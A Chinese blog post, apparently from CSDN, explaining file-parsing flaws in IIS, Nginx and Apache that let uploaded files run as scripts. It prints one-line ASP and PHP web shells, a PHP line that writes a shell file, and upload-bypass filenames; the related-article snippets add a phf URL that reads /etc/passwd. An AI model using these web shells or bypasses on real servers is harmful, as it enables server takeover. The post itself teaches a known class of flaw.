CGI解析漏洞

最新推荐文章于 2023-06-30 21:24:24 发布
最新推荐文章于 2023-06-30 21:24:24 发布
阅读量3.4k 收藏 7
点赞数 2
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/keep06/article/details/108168626
版权

CGI解析文件漏洞

文章目录

1.IIS 5.x~6.x中

这几个版本中,.cer,.asa,.cdx文件是使用asp.dll解析的那么就可以绕过

木马:
<%eval request("a")%>

我们可以尝试着上传一个后名为 lp.asp;.jpg文件,使用蚁剑连接;可以连接成功。

原理,windows在由左向右读取文件时第一个获取到的后缀就是文件类型,系统就会调用相对的组件运行。

可用后缀名:
.asa
.cer
.asp;.jpg
.asp;jpg
.cdx
.asp;.png(待测试)
.asp;.gif(待测试)
创建一个1.asp文件夹,该文件夹下的文件均会被当作asp文件处理

2.IIS 7.0~7.5 nginx8.0.3以下,nginx11

在以上版本中,均存在着url文件解析漏洞例如,/1.jpg/.php ;实际上是将1.jpg当成了1.php文件执行。

不过这个漏洞不能直接连接,不过既然能够执行php,那么我们生成一个shell.php就可以

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

3.Apache解析漏洞

Apache解析文件规则是从右向左开始解析,如果后缀名无法解析就会继续向左判断。例如,1.php.ra.owf

最终会被解析为1.php。如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个sec.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀

漏洞形式

•www.xxxx.xxx.com/test.php.php123

其余配置问题导致漏洞

•(1)如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。
(2)如果在 Apache 的 conf 里有这样一行配置 AddType application/x-httpd-php .jpg 即使扩展名是 jpg,一样能以 php 方式执行。

4.Nginx <0.8.03 空字节代码执行漏洞

影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

Nginx在图片中嵌入PHP代码然后通过访问

xxx.jpg%00.php

来执行其中的代码

keep06
关注
一次成功的cgi漏洞入侵
04-19
网站安全包括许多方面,尽管网管们千方百计的防范于未然,可有时还是难免疏漏。 我的“再谈cgi漏洞攻击”一文中,我利用cgi漏洞攻进几台服务器,这次我将以一次,从发现漏洞到利用漏洞, 从而攻进主机的全过程来讲解,与大家交流。
PHP-CGI漏洞(CVE-2024-4577)
最新发布
qq_64395221的博客
06-24 1622
通过前两篇文章的铺垫,现在我们可以了解 CVE-2024-4577这个漏洞的原理CVE-2024-4577是CVE-2012-1823这个老漏洞的绕过,php cgi的老漏洞至今已经12年,具体可以参考我的另一个文档简单来说,就是使用cgi模式运行的PHP,根据RFC3875的规定,Apache会将请求的QUERY_STRING作为命令行参数交给php-cgi执行。攻击者利用这个特性,就可以-d选项修改PHP的配置项,最后执行任意代码。
封神台--CGI解析漏洞
weixin_47757121的博客
06-09 494
首先是进行图片马的制作 使用windows中的cmd :copy 1.jpg/b+.php tpyjh.jpg
Nginx CGI解析漏洞
weixin_66717977的博客
06-30 296
Nginx解析漏洞
CGI漏洞利用
热门推荐
矿野上的脚印
07-18 1万+
CGI漏洞利用CGI漏洞是网管最容易乎视的地方,就我测试的这个网站上的漏洞, 我简单说一下,几个常见的漏洞地方。一般原理,解决方法,如果没有写全,请参考一些文献。 1,名字:?PageServices漏洞 这个漏洞是很多网站都有的。但是有好多人扫描出来确不知道如何运用,在此我简单谈一下吧,! 这个是可以显示页面清单的 方法是url/?PageServices 还可以这样试试 ! /?wp-cs-d
Iis7.0 cgi解析漏洞复现
孤的博客
09-30 598
漏洞形成原因: 漏洞与PHP配置有关,php.ini中的参数cgi.fix_pathinfo参数配置错误导致解析漏洞,开启了cgi.fix_pathinfo php.ini里默认cgi.fix_pathinfo=1,对其进行访问的时候,在URL路径后添加.php后缀名会当做php文件进行解析漏洞由此产生 是在 IIS7.5+php5.3+FastCGI 下的测试情况 漏洞条件 php.ini里...
文件上传解析漏洞(三)—IIS6.0解析漏洞CGI解析漏洞、Upload-labs-master20-23Wirteup
weixin_41487522的博客
06-18 969
文件上传解析漏洞(三)—IIS6.0解析漏洞CGI解析漏洞、Upload-labs-master20-23Wirteup IIS6.0解析漏洞 IIS6.0解析漏洞,其实有一些不如说是IIS6.0的一些特性,严格意义上而言,只是一些默认配置并不是漏洞但是也有一些的确是漏洞。 IIS解析漏洞一: IIS6.0除了将ASP后缀当做ASP进行解析的同时,当文件后缀名字为.asa .cer .cdx也会当做asp去解析,这是因为IIS6.0在应用程序扩展中默认设置了.asa .cer .cdx都会调用
IIS7.0 CGI解析漏洞环境部署及复现
7Riven's blog
12-06 640
环境部署 IIS环境搭建:windows server 2008 打开服务器管理器——添加角色 配置处理程序映射:管理工具 –> IIS -> WIN-UNI00QR5JE0 -> 处理程序映射 打开处理程序映射,选择添加模块映射 确定网站处于开启状态 漏洞产生的原因 PHP配置文件php.ini中的参数cgi.fix_pathinfo参数默认等...
【文件上传漏洞-07】中间件文件解析漏洞概述及实例——Apache、IIS和Nginx
m0_64378913的博客
07-12 3434
(1)第一种:未知扩展名解析漏洞 Apache对文件的解析主要是从右到左开始判断并进行解析,如果判断为不能解析的类型,则继续向左进行解析,如xx.php.wer.xxxxx将被解析为PHP类型。(2)第二种:局部配置 通过htaccess文件进行局部配置,定义不同文件名及后缀的解析方式。参考《【文件上传漏洞-06】.htaccess攻击实验(基于upload-labs-4靶场)》(1)加深理解Apache的两种解析漏洞原理; (2)掌握两种解析漏洞的检测及绕过方法。靶场:基于WAMP环境的...
php-cgi漏洞,PHP-CGI远程代码执行漏洞(CVE-2012-1823)
weixin_36023909的博客
03-24 806
PHP-CGI远程代码执行漏洞(CVE-2012-1823)漏洞分析PHP SAPI 与运行模式在PHP源码中,有一个目录叫sapi。sapi在PHP中的作用,类似一个消息的“传递者”,(PHP-FPM中的fpm,其作用就是接受web容器通过fastcgi协议封装好的数据,交给PHP解释器执行;除了fpm,最常见的sapi应该是用于Apache的mod_php,这个sapi用于php和apache...
PHP-CGI远程代码执行漏洞分析与防范
10-19
本文给大家介绍的是PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析和防范,这是最近爆出的一个php的比较严重的漏洞,这里分享给大家。
php cgi漏洞,CGI漏洞攻击合集上
weixin_42515739的博客
03-13 1888
Filename: README.patch.3018Algorithm #1 (sum -r): 37955 11 README.patch.3018Algorithm #2 (sum): 15455 11 README.patch.3018MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69Filename: patchSG0003018Algo20. ...
dev c++ 调试不按逻辑执行_DLink service.cgi远程命令执行漏洞分析
weixin_42390873的博客
12-08 192
上篇文章分析了信息泄露漏洞,可以获取到密码等信息。此次主要是基于上篇文章的认证,分析该系列设备的认证后的命令执行执行漏洞,该漏洞形成的原因是由于service.cgi在处理HTTP POST请求中的数据不当,形成命令拼接,导致可执行任意命令。漏洞描述该漏洞编号为CNVD-2018-01084[1],受影响的型号包括D-Link DIR 615、D-Link ...
Iis7.0-7.5 fast-cgi解析漏洞
墨鱼菜鸡
09-10 249
Iis7.0-7.5 fast-cgi解析漏洞 Test.jpg/.php cgi.fix_pathinfo 打开winserver2008安装phpstudy切换版本为IIS+php5.2.17更改php.ini文件中的cgi.fix_pathinfo=1开启模块重启phpstudy在网站根目录下(phpstudy/www)新建文件<?ph...
CGI漏洞攻击手册
baiseda
03-20 2180
在论坛里看到过bamboo写的CGI漏洞利用的文章,我就想把他扩大一些.一直想完善一些再贴上来,但我并没有机会和时间试过所有漏洞,想到论坛里还有那么多同志会来完善的,就取名CGI漏洞攻击手册version-0.02(升级了bamboo的),旨在抛砖引玉,欢迎任意修改,增加...更欢迎任意散播.:)一. phf漏洞这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/e...
CGI漏洞集锦
03-09 4255
一.phf漏洞这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd:lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd但是我们还能找到它吗?二.php.cgi 2.0beta10或更早版本的漏洞=版权所有  热点网络 热点下载  热点网络学院  版权所有
漏洞挖掘】——29、XSS闯关游戏录(上)
Fly_鹏程万里
03-22 2013
alf.nu/alert1是一个XSS训练平台,集结了一些常见的XSS漏洞利用场景,总共有29道题目。
在PHP中使用FastCGI解析漏洞及修复方案
romeoyue的专栏
01-09 2177
漏洞描述: Nginx默认是以CGI的方式支持PHP解析的,普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问http://192.168.1.102/phpinfo.jpg/1.php这个URL时,$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”,然后构造成SCRIPT_FILENAME传递给PHP CGI
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值